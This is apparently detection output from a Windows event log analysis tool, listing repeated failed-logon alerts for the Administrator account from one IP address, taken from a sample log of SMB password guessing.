2016-09-20 01:51:00.821 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7Fa7ebH7UXd1KW4X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.869 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wRBHXRkOa6x5KI5G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.915 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VNVxzgOLrZzfP3cB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.944 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yCNXajRX2lIgLQuc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.992 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x0nukf24IoalycOn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.101 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xZFZN0KfeHtyDppG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.144 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZmxqKyWU5GU1y22P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WuRyvCfgQ4rwG3fu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.220 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3prKZt5ymouwNKnK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.264 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CWrNNn13EC1FLwLA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.308 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SfnBT5OvT5cQXHfS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RLZFPCShXoPvvThS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.388 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UsPCJ0UlfH4urYrm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MIQlOetFByLZqPkT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.456 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c9IBZ0qTDlHWADZt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.491 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lmhkB39gKvvuT89e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.536 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4KPoZ8JB7WSjUCHW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0mwiPq4gF1YXkQSl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.615 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y5ncgrpwOFo7E8vg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.647 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KbkG8ezrAPFC0iKu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GW4WKkHocNadDzrb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.732 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: unbtFAiykcfKTbQT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oRzF1s9XVoRmoFQ6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9TO1c7eYd1IQHVwG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.852 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wsn5GM4BqEl6A6pY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.900 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pq350wqwVDQlTKu9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uMJWwjG7J2sOiBYd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.984 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3YusfxQQygi2x5Cu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.024 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6q29uj6ovfwz0riC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.072 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cj38VsqGLoQ8jGdf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.120 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TOW8OIO2vQRFaTID | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.173 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DfYITdZCYwEj9IJV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.205 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4BI6V35tZGZ1WGtJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wOF75n4aunKH9qxc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.296 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jsTFTCnFFBkhG5jP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.328 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5qiwcKE2TQui2H8z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.380 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PZOCyXplWOCyKbFm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.416 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RhyaAhYB78nbh1Ig | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.462 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MIJU9xbr1klIvvdE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.506 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qLKVR3mW3g3utO4X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aNm4tVG8bV7e9gbB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JtU0PCr9K5DXFYV2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.622 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CH3BWNPEWlw52Gb6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.660 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vQTYqFKBz6YEWhF6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.708 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qkj3u8ODgLD7xQ5R | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.758 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r9uyze1uO0zuNNUM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.803 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UmL15i3edXHcUamI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.840 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x7xjFRjv9rDhiXJ6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.880 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6BmQhVEv8g7EKu1F | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: upOMmG87cDO1NFg0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.963 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tO55KfkORhxFORvF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: D64wDbqkqmzWuUSa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sIDgNIlGA0cOkBOI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.082 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i0kXPQ6s7CGe4QGA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HW5jP389jmqSkzF1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.186 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: enhsof25BdDPcI2c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4acsPMLUJRrT7mmL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.272 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hi1dzny6hpyr5N3d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.305 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RlPVBSnDMlE0QZaJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.348 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: th72TwMoRXtDVWge | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.387 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KGTTiJSkErjzoUUC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xyzZwNLltF0cYnai | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.464 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gYWVQ6mCqyBfDm3m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.505 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rg2x2lv9JeS5Bb6l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.536 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fU28NKC3WYxFGbMN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EUWDXgnogGDXizWj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.629 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IXhAtnNcQKOIsuGS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.672 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cKfrJwI3OGdjL4af | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VdekC160hU7YzrK9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.773 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: enOBuzd6jwu8rZCH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.812 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eAjLjDlZSps5D49t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.844 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rY6CONLBVygSTnY5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.883 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6FIHgz2yqqbD9zfV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.918 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d82RRXgSmZdnfa8I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.968 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xA3ZWnWc9CoGeKpm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
